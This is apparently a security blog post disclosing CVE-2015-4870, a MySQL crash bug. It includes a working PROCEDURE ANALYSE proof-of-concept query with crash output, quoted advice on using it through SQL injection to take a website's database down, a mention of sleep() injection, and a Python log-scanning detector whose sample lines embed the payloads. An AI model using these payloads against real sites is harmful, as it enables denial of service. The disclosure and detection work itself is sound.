MySQL DoS in the Procedure Analyse Function – CVE-2015-4870


Sri Lankan security researcher Osanda Malith discovered a DoS (crash) vulnerability in MySQL's PROCEDURE ANALYSE function. The vulnerability crashes MySQL versions up to 5.5.45.


MySQL DoS/crash vulnerability details

Osanda Malith found this crash in the function PROCEDURE ANALYSE() when a subquery is passed as its first argument. The syntax of the triggering statement is:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows a single request is enough: mysql.exe crashes and an administrator has to restart the MySQL service by hand. On *nix systems mysqld recovers automatically, but if the attacker keeps sending GET requests carrying this payload the database is crashed again and again and stays effectively down.

Taking advantage (exploiting the crash bug)

Osanda Malith writes:

If you came across a website vulnerable to SQL injection you can simply perform a DoS attack so that MySQL server will not respond and the entire database of the website would be down meaning the website will be no longer in an active state.
In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server.

This is a very nasty side-effect of an SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. There an attacker injects sleep(3) into a vulnerable web application, making mysqld sleep for the given number of seconds, once per record found depending on where the sleep() is injected. That was a Denial of Service attack on the whole MySQL server, quickly consuming all available connections.


This crash/DoS vulnerability, however, needs only a single request to crash mysql.exe on Windows Server, and a continuous stream of requests on Linux/Unix systems, because there the mysqld service recovers automatically.
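Both payloads discussed above, the PROCEDURE ANALYSE subquery and the injected sleep(), leave recognisable traces in the web server's access log and, where it is enabled, in MySQL's general query log. The Python below is an added detection example written for this post; it is not code from the post or from Osanda Malith's advisory. The log lines it scans are constructed samples, and the page paths and the `id` parameter name are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample data (not real traffic). The first list mimics an Apache
# combined access log, the second the MySQL general query log.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Sep/2015:10:01:02 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Sep/2015:10:01:09 +0000] "GET /item.php?id=7%20procedure%20analyse((select*from(select%201)x),1) HTTP/1.1" 500 0',
    '198.51.100.9 - - [10/Sep/2015:10:02:15 +0000] "GET /item.php?id=7%20and%20sleep(3) HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Sep/2015:10:02:30 +0000] "GET /search.php?q=analyse+tools HTTP/1.1" 200 2048',
]
SAMPLE_GENERAL_LOG = [
    "150910 10:01:09\t   12 Query\tselect * from products where id=7 procedure analyse((select*from(select 1)x),1)",
    "150910 10:03:00\t   13 Query\tselect * from products where id=8",
]

# Most specific rule first: the CVE-2015-4870 shape (PROCEDURE ANALYSE with a
# subquery as first argument), then any PROCEDURE ANALYSE in user input, which
# has no business arriving from a browser, then the sleep() pattern.
RULES = [
    ("CVE-2015-4870 PROCEDURE ANALYSE subquery",
     re.compile(r"\bprocedure\s+analyse\s*\(\s*\(\s*select\b", re.I)),
    ("PROCEDURE ANALYSE in user input",
     re.compile(r"\bprocedure\s+analyse\s*\(", re.I)),
    ("MySQL sleep() injection",
     re.compile(r"\bsleep\s*\(\s*\d+(\.\d+)?\s*\)", re.I)),
]

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
GENERAL_RE = re.compile(r"^(?P<ts>\d{6}\s+\d\d:\d\d:\d\d)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.+)$")


def normalize(text):
    """Undo the usual obfuscations before matching: double URL encoding,
    '+' for space, and /**/ comments used in place of whitespace."""
    decoded = unquote_plus(unquote_plus(text))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def classify(text):
    """Return the name of the first matching rule, or None."""
    norm = normalize(text)
    for name, rx in RULES:
        if rx.search(norm):
            return name
    return None


def scan_access_log(lines):
    """Check every query-string parameter of each request separately, so a hit
    names the parameter used as the injection point."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            rule = classify(value)
            if rule:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "param": key, "rule": rule, "status": m.group("status")})
    return hits


def scan_general_log(lines):
    """Same rules applied to statements the server actually executed."""
    hits = []
    for line in lines:
        m = GENERAL_RE.match(line)
        if not m:
            continue
        rule = classify(m.group("sql"))
        if rule:
            hits.append({"time": m.group("ts"), "connection": m.group("conn"), "rule": rule})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG) + scan_general_log(SAMPLE_GENERAL_LOG):
        print(hit)
```

A 500 status (or, on Windows, a burst of requests followed by no further successful responses) paired with the first rule is a strong signal that the server was actually crashed rather than merely probed. Matching on decoded parameter values instead of the raw request line is what makes the double-encoded and comment-padded variants of the same payload show up under the same rule.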

Full MySQL vulnerability details blog post

Read the full details in Osanda Malith’s blog post.
